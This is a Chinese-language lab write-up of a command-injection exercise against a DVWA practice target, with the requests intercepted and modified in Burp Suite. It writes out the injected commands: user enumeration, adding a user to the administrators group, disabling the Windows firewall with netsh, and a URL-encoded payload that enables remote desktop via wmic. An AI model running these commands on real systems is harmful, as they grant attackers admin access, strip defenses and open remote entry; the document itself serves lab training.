目录

1、输入IP地址之后，靶机执行了一个Ping命令

2、burp拦截数据包发送到重发器

3、对数据包进行修改，注入命令

作业准备：

1、kali虚拟机

2、靶机：Jdk环境、搭建DVWA靶场、phpStudy（Apache和MySQL都已配置）、BurpSuite抓包

3、虚拟主机

1、输入IP地址之后，靶机执行了一个Ping命令

发现乱码

乱码解决方法：

解决此问题的方法：在DVWA-master\dvwa\includes目录下找到dvwaPage.inc.php文件中所有的”charset=utf-8”，修改”charset=gb2312”，即可

2、burp拦截数据包发送到重发器

3、对数据包进行修改，注入命令

①查看目标用户（whoami）

②查看目标机器上的用户（net user）

 ③在目标机器上添加一个用户

 

④查看上一步是否成功添加用户 

⑤将添加的用户添加到管理员组,以hacker为例

net localgroup administrators hacker/add 

⑥关闭目标防火墙

 netsh firewall set opmode mode=disable

或者

netsh advfirewall set allprofiles state off

⑦开启windows远程桌面

ip=127.0.0.1%26wmic%20RDTOGGLE%20WHERE%20ServerName=%27%COMPUTERNAME%%27%20call%20SetAllowTSConnections%201&Submit=Submit

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1